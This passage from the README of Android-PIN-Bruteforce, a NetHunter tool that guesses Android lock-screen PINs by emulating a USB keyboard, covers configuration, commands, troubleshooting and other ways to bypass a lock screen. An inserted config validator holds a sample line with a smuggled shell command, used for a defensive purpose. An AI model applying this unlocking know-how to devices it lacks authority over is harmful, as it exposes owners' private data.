is an optimised list of all possible 4 digit PINs, sorted by order of likelihood. 
It can be found with the filename <code>pinlist.txt</code> at <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>This list is used with permission from Justin Engler and Paul Vines (Senior Security Engineer, iSEC Partners), and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)</a></p> <br /><b>Cracking with Masks</b><br /> <p>Masks use <a href="https://www.kitploit.com/search/label/Regular%20Expressions" target="_blank" title="regular expressions">regular expressions</a> in the standard grep extended format.</p> <p><code>./android-pin-bruteforce crack --mask "...[45]" --dry-run</code></p> <ul> <li>To try all years from 1900 to 1999, use a mask of <code>19..</code></li> <li>To try PINs that have a 1 in the first digit and a 1 in the last digit, use a mask of <code>1..1</code></li> <li>To try PINs that end in 4 or 5, use <code>...[45]</code></li></ul><div><span style="font-family: monospace;"><br /></span></div><span style="font-size: large;"><b> Configuration for different phones</b></span><br /> <p>Device manufacturers create their own lock screens that are different to the default or stock Android. 
To find out what keys your phone needs, plug a keyboard into the phone and try out different combinations.</p> <p>Load a different configuration file, with the <code>--config FILE</code> commandline parameter.</p> <p>Example: <code>./android-pin-bruteforce --config ./config.samsung.s5 crack</code></p> <p>You can also edit the <code>config</code> file by customising the timing and keys sent.</p> <p>The following configuration variables can be used to support a different phone's lockscreen.</p> <pre><code># Timing<br />## DELAY_BETWEEN_KEYS is the period of time in seconds to wait after each key is sent<br />DELAY_BETWEEN_KEYS=0.25<br /><br />## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br />## SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END defines how many seconds before the end of the cooldown period, keys will be sent<br /># set to 0 to disable<br />SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END=5<br />## SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END configures the keys that are sent to dismiss messages and popups before the end of the cooldown period<br />SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END="enter enter enter"<br /><br />## KEYS_BEFORE_EACH_PIN configures the keys that are sent to prompt the lock screen to appear. 
This is sent before each PIN.<br />## By default it sends "escape enter", but some phones will respond to other keys.<br /><br /># Examples:<br /># KEYS_BEFORE_EACH_PIN="ctrl_escape enter"<br /># KEYS_BEFORE_EACH_PIN="escape space"<br />KEYS_BEFORE_EACH_PIN="escape enter"<br /><br />## KEYS_STAY_AWAKE_DURING_COOLDOWN configures the keys that are sent during the cooldown period to keep the phone awake<br />KEYS_STAY_AWAKE_DURING_COOLDOWN="enter"<br /><br />## SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS is how often the keys are sent, in seconds<br />SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS=5<br /><br />## DELAY_BEFORE_STARTING is the period of time in seconds to wait before the bruteforce begins<br />DELAY_BEFORE_STARTING=2<br />## KEYS_BEFORE_STARTING configures the keys that are sent before the bruteforce begins<br />KEYS_BEFORE_STARTING="enter"<br /></code></pre> <br /><b>Popups</b><br /> <p>We send keys before the end of the cooldown period, or optionally during the cooldown period. This is to keep the lockscreen app active and to dismiss any popups about the number of incorrect PIN attempts or a low battery warning.</p> <br /><span style="font-size: large;"><b>Test sending keys from the NetHunter phone</b></span><br /> <br /><b>Test sending keys from the terminal</b><br /> <p>Use ssh from your laptop to the NetHunter phone, and use the following commands to test sending keys.</p> <p>In this example, the enter key is sent.</p> <p><code>echo "enter" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>In this example, ctrl-escape is sent.</p> <p><code>echo "left-ctrl escape" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>Note: Sending combinations of keys in <code>config</code> file variables is different. 
Currently only <code>ctrl_escape</code> is supported.</p> <p>In this example, keys a, b, c are sent.</p> <p><code>echo a b c | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <br /><b>Test sending keys from an app</b><br /> <p>This Android app is a virtual USB Keyboard that you can use to test sending keys.</p> <p><a href="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/" rel="nofollow" target="_blank" title="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/">https://store.nethunter.com/en/packages/remote.hid.keyboard.client/</a></p> <br /><b>How to send special keys</b><br /> <p>Use this list for the following variables:</p> <ul> <li>KEYS_BEFORE_EACH_PIN</li> <li>KEYS_STAY_AWAKE_DURING_COOLDOWN</li> <li>KEYS_BEFORE_STARTING</li> </ul> <p>To send special keys use the following labels. This list can be found in the hid_gadget_test source code.</p> <table> <tr> <th>Key label</th> <th>Key label</th> </tr> <tr> <td>left-ctrl</td> <td>f6</td> </tr> <tr> <td>right-ctrl</td> <td>f7</td> </tr> <tr> <td>left-shift</td> <td>f8</td> </tr> <tr> <td>right-shift</td> <td>f9</td> </tr> <tr> <td>left-alt</td> <td>f10</td> </tr> <tr> <td>right-alt</td> <td>f11</td> </tr> <tr> <td>left-meta</td> <td>f12</td> </tr> <tr> <td>right-meta</td> <td>insert</td> </tr> <tr> <td>return</td> <td>home</td> </tr> <tr> <td>esc</td> <td>pageup</td> </tr> <tr> <td>bckspc</td> <td>del</td> </tr> <tr> <td>tab</td> <td>end</td> </tr> <tr> <td>spacebar</td> <td>pagedown</td> </tr> <tr> <td>caps-lock</td> <td>right</td> </tr> <tr> <td>f1</td> <td>left</td> </tr> <tr> <td>f2</td> <td>down</td> </tr> <tr> <td>f3</td> <td>kp-enter</td> </tr> <tr> <td>f4</td> <td>up</td> </tr> <tr> <td>f5</td> <td>num-lock</td> </tr> </table> <p>To send more than one key at the same time, use the following list:</p> <ul> <li>ctrl_escape (This sends left-ctrl and escape)</li> </ul> <p>If you need more key combinations please open a new issue in the GitHub issues list.</p> <br 
/><b>Customising the Progressive Cooldown</b><br /> <p>The following section of the <code>config</code> file controls the progressive cooldown.</p> <pre><code>## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br /></code></pre> <p>The three arrays are indexed together: each index corresponds to one row of this table.</p> <table> <tr> <th>attempt number</th> <th>attempts until cooldown</th> <th>cooldown (seconds)</th> </tr> <tr> <td>1</td> <td>5</td> <td>30</td> </tr> <tr> <td>11</td> <td>1</td> <td>30</td> </tr> <tr> <td>41</td> <td>1</td> <td>60</td> </tr> </table> <br /><b>Why can't you use a laptop?</b><br /> <p>This works from an Android phone rather than a laptop because laptop USB ports are not bidirectional: they only act as a USB host, whereas a phone's USB port can also act as a USB device.</p> <br /><b>How Android emulates a keyboard</b><br /> <p>Keys are sent using <code>/system/xbin/hid-keyboard</code>. To test this and send the key 1 you can use <code>echo 1 | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>In Kali Nethunter, <code>/system/xbin/hid-keyboard</code> is a compiled copy of <code>hid_gadget_test.c</code>. This is a small program for testing the HID gadget driver that is included in the Linux Kernel. 
The source code for this file can be found at <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> and <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a>.</p> <br /><span style="font-size: large;"><b>Troubleshooting</b></span><br /> <br /><b>If it is not bruteforcing PINs</b><br /> <br /><b>Check the orientation of the cables</b><br /> <p>The NetHunter phone should have a regular USB cable attached, while the locked phone should have the OTG adaptor attached. Refer to the graphic on how to connect the phones.</p> <br /><b>Check it is emulating a keyboard</b><br /> <p>You can verify that the NetHunter phone is successfully emulating a keyboard by connecting it to a computer using a regular charging/data USB cable. Open a text editor like Notepad while it is cracking and you should see it entering PIN numbers into the text editor.</p> <p>Note that you will not need an OTG cable for this.</p> <br /><b>Try restarting the phones</b><br /> <p>Try powering off the phones and even taking out the batteries if that is possible.</p> <br /><b>Try new cables</b><br /> <p>Try using new cables/adaptors, as you may have a faulty cable/adaptor.</p> <br /><b>If it doesn't unlock the phone with a correct PIN</b><br /> <p>You might be sending keys too fast for the phone to process. Increase the DELAY_BETWEEN_KEYS variable in the config file. If you don't see 4 dots appear on the phone's screen, it may not be receiving all 4 keys.</p>
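The <code>config</code> file loaded with <code>--config</code> is a shell script that the tool sources, which is why the Known Issues section below warns against using configuration files from unknown sources. The Python script below is an added example, not part of Android-PIN-Bruteforce, that reviews such a file before it is ever sourced: it accepts only blank lines, comments and plain literal assignments to the variables documented above, rejects any line carrying shell constructs such as <code>$(...)</code>, backticks, <code>;</code> or <code>|</code>, and checks that the three PROGRESSIVE_ARRAY_* arrays have the same length. The two sample configs are constructed for this example.

```python
import re
import sys

# Variables documented for the config file above; any other name is flagged.
KNOWN_VARS = {
    "DELAY_BETWEEN_KEYS",
    "PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________",
    "PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN",
    "PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____",
    "SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END",
    "SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END",
    "KEYS_BEFORE_EACH_PIN",
    "KEYS_STAY_AWAKE_DURING_COOLDOWN",
    "SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS",
    "DELAY_BEFORE_STARTING",
    "KEYS_BEFORE_STARTING",
}
# The three arrays are indexed together (one row of the cooldown table per index).
PROGRESSIVE_VARS = (
    "PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________",
    "PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN",
    "PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____",
)

NUMBER = r"[0-9]+(?:\.[0-9]+)?"
# A line passes only as NAME=<number>, NAME="<key labels>" or NAME=(<numbers>),
# with nothing after the value. The value grammar contains no $, backtick,
# ; | & or redirection characters, so no command can hide in an accepted line.
ASSIGNMENT = re.compile(
    rf'^([A-Z_]+)=(?:({NUMBER})|"([a-z0-9_. -]*)"|\(({NUMBER}(?:[ \t]+{NUMBER})*)\))[ \t]*$'
)


def review_config(text):
    """Return a list of (line_number, message) findings for a config file's text.
    An empty list means every line is blank, a comment, or a literal assignment
    to a documented variable, and the progressive arrays are consistent."""
    findings = []
    values = {}
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # '#' and '##' comments and blank lines are harmless
        m = ASSIGNMENT.match(line)
        if m is None:
            findings.append((lineno, f"not a plain literal assignment: {raw!r}"))
            continue
        name, number, keys, array = m.groups()
        if name not in KNOWN_VARS:
            findings.append((lineno, f"undocumented variable {name}"))
            continue
        if name in PROGRESSIVE_VARS and array is None:
            findings.append((lineno, f"{name} must be a parenthesised list"))
            continue
        if array is not None:
            values[name] = [float(x) for x in array.split()]
        elif number is not None:
            values[name] = float(number)
        else:
            values[name] = keys.split()
    # The arrays are walked in lockstep, so a length mismatch is a config bug.
    lengths = {n: len(values[n]) for n in PROGRESSIVE_VARS if n in values}
    if len(set(lengths.values())) > 1:
        findings.append((0, f"progressive arrays differ in length: {lengths}"))
    return findings


# Constructed sample: the documented settings from this page, unchanged.
GOOD_CONFIG = """\
# Timing
## DELAY_BETWEEN_KEYS is the period of time in seconds to wait after each key is sent
DELAY_BETWEEN_KEYS=0.25

PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)
PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)
PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)

SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END=5
SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END="enter enter enter"
KEYS_BEFORE_EACH_PIN="escape enter"
KEYS_STAY_AWAKE_DURING_COOLDOWN="enter"
SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS=5
DELAY_BEFORE_STARTING=2
KEYS_BEFORE_STARTING="enter"
"""

# Constructed sample: a command appended to a value (a harmless echo stands in
# for anything a hostile file might run), an undocumented variable, and an
# array that is one entry short.
BAD_CONFIG = """\
DELAY_BETWEEN_KEYS=0.25
PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)
PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1)
PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)
KEYS_BEFORE_EACH_PIN="escape enter"; echo would-run-here
SOME_OTHER_VAR=1
"""

if __name__ == "__main__":
    # Usage: python review_config.py ./config.samsung.s5 (defaults to BAD_CONFIG)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else BAD_CONFIG
    for lineno, message in review_config(text) or [(0, "no findings")]:
        print(f"line {lineno}: {message}")
```

Only a file that produces no findings is worth sourcing; anything flagged should be read by hand, since the checker is deliberately strict and will also reject legitimate but unusual lines (an inline trailing comment, an unquoted key list) rather than guess at them.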
<br /><b>Managing Power Consumption</b><br /> <p>If your phone runs out of power too soon, follow these steps:</p> <ul> <li>Make sure both phones are fully charged to 100% before you begin</li> <li>Reduce the screen brightness on both the victim phone and NetHunter phone if possible</li> <li>Place both phones into Airplane mode; you may want to keep WiFi enabled to access the NetHunter phone via SSH.</li> <li>The locked phone will power the NetHunter phone, because it appears as a keyboard accessory</li> <li>Use a USB OTG cable with a Y splitter for an external power supply, to allow charging of the NetHunter phone while cracking</li> <li>Take breaks to charge your devices. Pause the script with CTRL-Z and resume with the <code>fg</code> shell command.</li> <li>Avoid the SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS configuration option, which makes the locked phone use more battery to keep the screen powered. Use the SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END option instead (the default).</li> </ul> <br /><b>Check the Diagnostics Report</b><br /> <p>Use the <code>diag</code> command to display diagnostic information.</p> <p><code>bash ./android-pin-bruteforce diag</code></p> <p>If you receive this message when the USB cable is plugged in, try taking the battery out of the locked Android phone and power cycling it.</p> <p><code>[FAIL] HID USB device not ready. Return code from /system/xbin/hid-keyboard was 5.</code></p> <br /><b>How the usb-devices command works</b><br /> <p>The diagnostics command uses the <code>usb-devices</code> script, but only to help determine whether the USB cables are connected incorrectly. 
This can be downloaded from <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Use verbose output</b><br /> <p>Use the <code>--verbose</code> option to check that the configuration is as expected. This is especially useful when you are modifying the configuration.</p> <br /><b>Use the dry-run</b><br /> <p>Use the <code>--dry-run</code> option to check how it operates without sending any keys to a device. This is especially useful when you are modifying the configuration or during development.</p> <p>Dry run will:</p> <ul> <li>Not send any keys</li> <li>Continue instead of aborting if the <code>KEYBOARD_DEVICE</code> or <code>HID_KEYBOARD</code> is missing.</li> </ul> <br /><b>HID USB Mode</b><br /> <p>Try this command in a shell on the NetHunter phone: <code>/system/bin/setprop sys.usb.config hid</code></p> <br /><span style="font-size: large;"><b>Known Issues</b></span><br /> <ul> <li>This cannot detect when the correct PIN is guessed and the phone unlocks.</li> <li>Your phones may run out of battery before the correct PIN is found.</li> <li>Don't trust phone configuration files from unknown sources without reviewing them first. 
The configuration files are shell scripts and could include malicious commands.</li> </ul> <br /><span style="font-size: large;"><b>Roadmap</b></span><br /> <ul> <li>[DONE] Works</li> <li>[DONE] Detects USB HID failures</li> <li>[DONE] Improve Usage and commandline options/config files</li> <li>[DONE] Add bruteforce for n digit PINs</li> <li>[DONE] Mask for known digits</li> <li>[DONE] Crack PIN list in reverse (to find which recent PIN unlocked the device)</li> <li>[DONE] Implement configurable lockscreen prompt</li> <li>[DONE] Implement cooldown change after 10 attempts</li> <li>[WORKING] Find/test more devices to bruteforce</li> <li>Add progress bar</li> <li>Add ETA</li> <li>ASCII art</li> <li>Nicer GUI for NetHunter</li> <li>Implement for iPhone</li> <li>Detect when a phone is unlocked (Use Nethunter camera as a sensor?)</li> <li>Crack Android Patterns (try common patterns first)</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.</p> <p>Please make sure to update tests as appropriate.</p> <br /><span style="font-size: large;"><b>Authors and acknowledgment</b></span><br /> <p>Developed by Andrew Horton (@urbanadventurer).</p> <p>The following people have been very helpful:</p> <ul> <li>Vlad Filatov (@v1adf): Testing many phones for the Wiki Phone Database</li> </ul> <br /><b>Motivation</b><br /> <p>My original motivation to develop this was to unlock a Samsung S5 Android phone. It had belonged to someone who had passed away, and their family needed access to the data on it. 
As I didn't have a USB <a href="https://www.kitploit.com/search/label/Rubber%20Ducky" target="_blank" title="Rubber Ducky">Rubber Ducky</a> or any other hardware handy, I tried using a variety of methods, and eventually realised I had to develop something new.</p> <br /><b>Credit</b><br /> <p>The optimised PIN list is from Justin Engler (@justinengler) and Paul Vines (Senior Security Engineer, iSEC Partners) and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO).">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)</a>.</p> <br /><b>Graphics</b><br /> <p>Designed by Andrew Horton, gratefully using these free vector packs:</p> <ul> <li><a href="https://www.vecteezy.com/vector-art/159576-usb-ports-isometric-free-vector" rel="nofollow" target="_blank" title="USB Ports Isometric Free Vector by VisionHeldup">USB Ports Isometric Free Vector by VisionHeldup</a></li> <li><a href="https://www.vecteezy.com/vector-art/107006-hdmi-and-usb-vector-set" rel="nofollow" target="_blank" title="HDMI and USB Vector Set by Mary Winkler">HDMI and USB Vector Set by Mary Winkler</a></li> <li><a href="https://www.vecteezy.com/vector-art/661831-isometric-data-security-illustration" rel="nofollow" target="_blank" title="Isometric Data Security Illustration by Rizal.Medanguide">Isometric Data Security Illustration by Rizal.Medanguide</a></li> <li>Kali NetHunter Logo</li> </ul> <br /><span style="font-size: large;"><b>Comparison with other projects and methods to unlock a locked Android phone</b></span><br /> <br /><b>What makes this project unique?</b><br /> <p>I've been asked what makes this project unique when there are other open-source Android PIN cracking projects.</p> <p>Android-PIN-Bruteforce is unique because it cracks the PIN on Android phones from a NetHunter 
phone and it doesn't need the locked phone to be pre-hacked.</p> <p>It works:</p> <ul> <li>Without having to buy special hardware, such as a Rubber Ducky, Celebrite, or XPIN Clip.</li> <li>Without ADB or root access (the phone doesn't have to be pre-hacked).</li> </ul> <table> <tr> <th>Project</th> <th>ADB/USB Debugging</th> <th>Requires root</th> <th>Requires $ hardware</th> <th>Commercial</th> </tr> <tr> <td><div>⭐</div> Android-PIN-Bruteforce</td> <td>No</td> <td>No</td> <td>Nethunter phone</td> <td>No</td> </tr> <tr> <td>github.com/PentesterES/AndroidPINCrack</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/ByteRockstar1996/Cracking-Android-Pin-Lock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/sch3m4/androidpatternlock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/georgenicolaou/androidlockcracker</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/MGF15/P-Decode</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/BitesFor/ABL</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/wuseman/WBRUTER</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/Gh005t/Android-BruteForce</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/mandatoryprogrammer/droidbrute</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>No</td> </tr> <tr> <td>github.com/hak5darren/USB-Rubber-Ducky</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>Yes</td> </tr> <tr> <td>github.com/bbrother/stm32f4androidbruteforce</td> <td>No</td> <td>No</td> <td>STM32F4 dev board $</td> <td>No</td> </tr> <tr> <td>hdb-team.com/product/hdbox/</td> <td>No</td> <td>No</td> <td>HDBOX $$</td> <td>Yes</td> </tr> <tr> <td>xpinclip.com</td> <td>No</td> <td>No</td> <td>XPINClip $$</td> <td>Yes</td> </tr> <tr> <td>cellebrite.com/en/ufed/</td> <td>No</td> <td>No</td> 
<td>Cellebrite UFED $$$</td> <td>Yes</td> </tr> </table> <p>Some of these projects/products are really awesome, but they achieve a different goal from Android-PIN-Bruteforce.</p> <p>If a project requires a gesture.key or password.key, I've listed it as requiring root. If a project requires a custom bootloader, I've listed that as requiring both ADB and root. If you would like your project listed in this table then please open a new issue. There are links to each of these projects in the Related Projects & Further Reading section.</p> <br /><b>Regular phone users</b><br /> <ul> <li>Try the top 20 PINs from the <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="DataGenetics PIN analysis">DataGenetics PIN analysis</a> that apparently unlocks 26.83% of phones.</li> <li>Use an SMS lock-screen bypass app (requires app install before phone is locked)</li> <li>Use Samsung Find My Mobile (requires you set it up before phone is locked)</li> <li>Crash the Lock Screen UI (Android 5.0 and 5.1)</li> <li>Use the Google Forgot pattern, Forgot PIN, or Forgot password (Android 4.4 KitKat and earlier)</li> <li>Factory Reset (you lose all your data)</li> </ul> <br /><b>Users who have already replaced their Android ROM</b><br /> <p>These apply if the phone has already been rooted, or has USB debugging or adb enabled.</p> <ul> <li>Flash the <code>Pattern Password Disable</code> ZIP using a custom recovery (Requires TWRP, CMW, Xrec, etc.)</li> <li>Delete <code>/data/system/gesture.key</code> or <code>password.key</code> (requires root and adb on locked device)</li> <li>Crack <code>/data/system/gesture.key</code> and <code>password.key</code> (requires root and adb on locked device)</li> <li>Update sqlite3 database <code>settings.db</code> (requires root and adb on locked device)</li> </ul> <br /><b>Forensic Investigators</b><br /> <p>These methods can be expensive and are usually only used by 
specialised phone forensic investigators.</p> <p>In order of difficulty and expense:</p> <ul> <li>Taking advantage of USB debugging being enabled (Oxygen Forensic Suite)</li> <li>Bruteforce with keyboard emulation (<div>⭐</div> Android-PIN-Bruteforce, RubberDucky attack, XPIN Clip, HDBox)</li> <li>JTAG (Interface with TAPs (Test Access Ports) on the device board)</li> <li>In-System Programming (ISP) (Involves directly connecting to pins on flash memory chips on the device board)</li> <li>Chip Off (Desolder and remove flash memory chips from the device)</li> <li>Clock Glitching / Voltage <a href="https://www.kitploit.com/search/label/Fault%20Injection" target="_blank" title="Fault Injection">Fault Injection</a> (Hardware CPU timing attacks to bypass PIN restrictions)</li> <li>Bootloader exploits (Zero-day exploits that attack the bootloader. GrayKey from Grayshift and Cellebrite)</li> </ul> <p>JTAG, ISP, and Chip Off techniques are less useful now because most devices are encrypted. I don't know of any practical attacks on phone PINs that use clock glitching; if you know of a product that uses this technique, please let me know so I can include it.</p> <br /><b>Security Professionals and Technical Phone Users</b><br /> <p>Use the USB HID Keyboard Bruteforce with some dedicated hardware.</p> <ul> <li>A RubberDucky and Darren Kitchen's Hak5 brute-force script</li> <li>Write a script for a USB Teensy</li> <li>Buy expensive forensic hardware</li> <li>Or you can use Android-PIN-Bruteforce with your NetHunter phone!</li> </ul> <p>Attempts to use Duck Hunter, an otherwise awesome project, to emulate a RubberDucky payload for Android PIN cracking did not work. 
It crashed the phone, probably because of the payload length.</p><p><br /></p><span style="font-size: large;"><b> Related Projects & Further Reading</b></span><br /> <br /><b>USB HID Hardware without NetHunter</b><br /> <p>hak5 12x17: Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky <a href="https://archive.org/details/hak5_12x17" rel="nofollow" target="_blank" title="https://archive.org/details/hak5_12x17">https://archive.org/details/hak5_12x17</a></p> <p>Hak5: USB Rubber Ducky <a href="https://shop.hak5.org/products/usb-rubber-ducky-deluxe" rel="nofollow" target="_blank" title="https://shop.hak5.org/products/usb-rubber-ducky-deluxe">https://shop.hak5.org/products/usb-rubber-ducky-deluxe</a></p> <p>USB-Rubber-Ducky Payloads <a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" rel="nofollow" target="_blank" title="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads">https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads</a></p> <p>Teensy <a href="https://www.pjrc.com/teensy/" rel="nofollow" target="_blank" title="https://www.pjrc.com/teensy/">https://www.pjrc.com/teensy/</a></p> <p>Brute Forcing An Android Phone with a STM32F4Discovery Development Board <a href="https://github.com/bbrother/stm32f4androidbruteforce" rel="nofollow" target="_blank" title="https://github.com/bbrother/stm32f4androidbruteforce">https://github.com/bbrother/stm32f4androidbruteforce</a> <a href="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/" rel="nofollow" target="_blank" title="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/">https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/</a></p> <p>Automated brute force attack against the Mac EFI PIN (Using a Teensy) <a href="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html" rel="nofollow" target="_blank" title="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html">https://orvtech.com/atacar-efi-pin-macbook-pro-en.html</a> <a 
href="https://hackaday.io/project/2196-efi-bruteforcer" rel="nofollow" target="_blank" title="https://hackaday.io/project/2196-efi-bruteforcer">https://hackaday.io/project/2196-efi-bruteforcer</a></p> <p>Droidbrute: An Android PIN cracking USB rubber ducky payload made efficient with a statistically generated wordlist. <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>Discussion forum about the hak5 episode, and Android Brute Force 4-digit pin <a href="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/" rel="nofollow" target="_blank" title="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/">https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/</a></p> <br /><b>NetHunter HID keyboard attacks</b><br /> <p>NetHunter HID Keyboard Attacks <a href="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/" rel="nofollow" target="_blank" title="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/">https://www.kali.org/docs/nethunter/nethunter-hid-attacks/</a></p> <br /><b>Linux Kernel HID support</b><br /> <p>Human Interface Devices (HID) <a href="https://www.kernel.org/doc/html/latest/hid/index.html#" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/hid/index.html#">https://www.kernel.org/doc/html/latest/hid/index.html#</a></p> <p>Linux USB HID gadget driver and hid-keyboard program <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a></p> <p>The 
